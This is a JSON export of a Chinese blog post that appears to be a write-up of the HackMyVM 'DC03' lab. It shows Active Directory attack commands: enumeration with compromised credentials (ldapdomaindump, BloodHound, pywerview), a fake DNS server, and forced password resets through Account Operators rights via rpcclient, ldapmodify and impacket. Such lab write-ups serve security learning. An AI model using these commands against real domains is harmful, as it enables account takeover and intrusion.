{"id":982,"date":"2024-09-03T22:31:48","date_gmt":"2024-09-03T14:31:48","guid":{"rendered":"http:\/\/xiyu12.top\/?p=982"},"modified":"2024-09-03T22:31:48","modified_gmt":"2024-09-03T14:31:48","slug":"hackmyvm-dc03","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=982","title":{"rendered":"hackmyvm-dc03"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">1.<strong>LLMNR<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u94fe\u8def\u672c\u5730\u591a\u64ad\u540d\u79f0\u89e3\u6790<\/strong>(\u00a0<strong>LLMNR<\/strong>\u00a0) \u662f\u4e00\u79cd\u57fa\u4e8e<a href=\"https:\/\/en.wikipedia.org\/wiki\/Domain_Name_System\">\u57df\u540d\u7cfb\u7edf<\/a>(DNS) \u6570\u636e\u5305\u683c\u5f0f\u7684\u534f\u8bae\uff0c\u5141\u8bb8<a href=\"https:\/\/en.wikipedia.org\/wiki\/IPv4\">IPv4<\/a>\u548c<a href=\"https:\/\/en.wikipedia.org\/wiki\/IPv6\">IPv6<\/a>\u4e3b\u673a\u5bf9\u540c\u4e00\u672c\u5730\u94fe\u8def\u4e0a\u7684\u4e3b\u673a\u6267\u884c\u540d\u79f0\u89e3\u6790\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/09\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-09-03-220735-1024x486.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/09\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-09-03-220735-1024x486.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-983\"\/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">2.ad\u57df\u7528\u6237\/\u7ec4\u4fe1\u606f\u6536\u96c6<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>ldapdomaindump<\/strong> \u4f7f\u7528ldap\u534f\u8bae\u6536\u96c6\u57df\u4fe1\u606f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">ldapdomaindump soupedecode.local -u &#8216;soupedecode.local\\zximena448&#8217; -p &#8216;internet&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u83b7\u5f97 domain_users.html \\domain_group.html \\domain_computer.html  <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/09\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-09-03-221117-1024x149.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/09\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-09-03-221117-1024x149.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-985\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>bloodhound <\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528\u65f6\uff0c\u63d0\u793a\u9519\u8bef\uff0cdns\u670d\u52a1\u5668\u4e0d\u5b58\u5728<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528\u5047\u7684 dns \u670d\u52a1\u5668<a href=\"https:\/\/github.com\/iphelix\/dnschef\">https:\/\/github.com\/iphelix\/dnschef<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sudo python3 \/opt\/dnschef\/dnschef.py &#8211;fakeip 192.168.130.25<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">bloodhound-python -c All -u XKATE578 -p jesuschrist -d SOUPEDECODE.LOCAL -ns 127.0.0.1 -dc dc01<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sudo neo4j start<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sudo bloodhound<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>pywerview.py<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">python pywerview.py get-netuser -w soupedecode -u xkate578 -p  jesuschrist  <em>-t  192.168.130.25 &#8211;username xkate578<\/em><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/09\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-09-03-222328.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/09\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-09-03-222328.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-986\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">3.Account Operators\u7ec4 \u548c\u4fee\u6539\u5bc6\u7801<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Account Operators \u662f\u7cfb\u7edf\u5185\u7f6e\u7ec4  \u5177\u6709\u4fee\u6539\u666e\u901a\u8d26\u6237\u7684\u5bc6\u7801 \u548c\u589e\u52a0\u4e00\u4e2a\u65b0\u7528\u6237\u7684\u6743\u9650<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4fee\u6539\u5bc6\u7801\u7684\u65b9\u6cd5  \uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">rpcclient <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">rpcclient -U &#8216;XKATE578%jesuschrist&#8217; 192.168.130.25<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">lookupnames fbeth103<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">setuserinfo2 fbeth103 23 &#8216;P@ssw0rd&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">ldapmodify\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/09\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-09-03-222916.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/09\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-09-03-222916.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-987\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>dn: CN=Fanny Beth,CN=Users,DC=soupedecode,DC=local\nchangetype: modify\nreplace: unicodePwd\nunicodePwd:: IgBOAGUAdwBQAGEAcwBzAHcAbwByAGQAIwA1ADIAMgA0AA==\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">ldapmodify -x -D &#8220;CN=Xenia Kate,CN=Users,DC=SOUPEDECODE,DC=LOCAL&#8221; -w &#8220;xxxxx&#8221; -H ldap:\/\/192.168.130.25 -f reset_password.ldif<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">impacket-changepasswd<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">impacket-changepasswd &#8216;soupedecode.local\/fbeth103&#8217;@192.168.130.25 -altuser xkate578 -altpass &#8220;jesuschrist&#8221; -newpass fbeth103 -no-pass -reset<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u91cd\u7f6e\u5bc6\u7801\u5931\u8d25\u4e86<\/p>\n","protected":false},"excerpt":{"rendered":"<p>1.LLMNR \u94fe\u8def\u672c\u5730\u591a\u64ad\u540d\u79f0\u89e3\u6790(\u00a0LLMNR\u00a0) \u662f\u4e00\u79cd\u57fa\u4e8e\u57df\u540d\u7cfb\u7edf(DNS) \u6570\u636e\u5305\u683c\u5f0f\u7684\u534f\u8bae\uff0c\u5141\u8bb8I [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,1,9],"tags":[],"class_list":["post-982","post","type-post","status-publish","format-standard","hentry","category-windows","category-uncategorized","category-target-aircraft"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/982","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=982"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/982\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=982"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=982"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=982"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}